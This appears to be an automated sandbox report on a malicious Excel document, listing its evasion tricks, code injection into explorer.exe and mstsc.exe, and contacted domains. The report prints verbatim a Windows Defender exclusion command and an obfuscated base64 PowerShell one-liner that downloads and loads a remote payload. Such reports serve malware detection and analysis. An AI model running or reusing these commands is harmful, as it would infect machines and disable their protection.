Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: PO.78NO9.xls Stream path 'MBD008EDE52/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: PO.78NO9.xls Stream path 'Workbook' entropy: 7.99872932515 (max. 8.0)
Source: FC830000.0.dr Stream path 'MBD008EDE52/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: FC830000.0.dr Stream path 'Workbook' entropy: 7.99888812156 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731C1DA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BFBA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BFDA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731C25A
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 89B7E second address: 89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 250000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 2280000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 1F60000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 80C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 90C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 92C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: A2C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Memory allocated: 460000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Memory allocated: 20C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Memory allocated: 1D00000 memory reserve | memory write watch
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A40101 rdtsc 22_2_00A40101
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 414 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1142 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 859 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6282 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 602 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4246 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\mstsc.exe API coverage: 0.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3212 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104 Thread sleep count: 859 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep count: 6282 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2168 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2088 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2088 Thread sleep time: -3000000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2088 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 1732 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 2728 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592 Thread sleep count: 602 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592 Thread sleep count: 4246 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2584 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1408 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 3708 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\niLILOT.exe TID: 3956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 3836 Thread sleep time: -48000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_009120E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose, 27_2_009120E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000017.00000000.488448630.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000017.00000000.488448630.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000017.00000000.487849649.00000000025E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000017.00000000.488448630.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A40101 rdtsc 22_2_00A40101
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F00C4 NtCreateFile,LdrInitializeThunk, 22_2_009F00C4
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00913AE1 LoadLibraryW,GetProcAddress,FreeLibrary, 27_2_00913AE1
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009E0080 mov ecx, dword ptr fs:[00000030h] 22_2_009E0080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009E00EA mov eax, dword ptr fs:[00000030h] 22_2_009E00EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A026F8 mov eax, dword ptr fs:[00000030h] 22_2_00A026F8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F26F8 mov eax, dword ptr fs:[00000030h] 27_2_021F26F8
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00938791 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 27_2_00938791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.my-tournament.live
Source: C:\Windows\explorer.exe Domain query: www.senior-dating-73474.bond
Adds a directory exclusion to Windows Defender
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe" Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe NtClose: Indirect: 0x3CA56C
Source: C:\Windows\SysWOW64\mstsc.exe NtClose: Indirect: 0x201A56C
Source: C:\Windows\SysWOW64\mstsc.exe NtMapViewOfSection: Indirect: 0x2019D47
Source: C:\Windows\SysWOW64\mstsc.exe NtQueueApcThread: Indirect: 0x201A531
Source: C:\Windows\SysWOW64\mstsc.exe NtUnmapViewOfSection: Indirect: 0x2019DB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe NtClose: Indirect: 0x36A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe NtQueueApcThread: Indirect: 0x3CA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe NtQueueApcThread: Indirect: 0x36A4F2
Source: C:\Windows\SysWOW64\mstsc.exe NtClose: Indirect: 0x2019DC5
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Thread register set: target process: 1244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 1244
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 8D0000
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4D0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4D2000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgc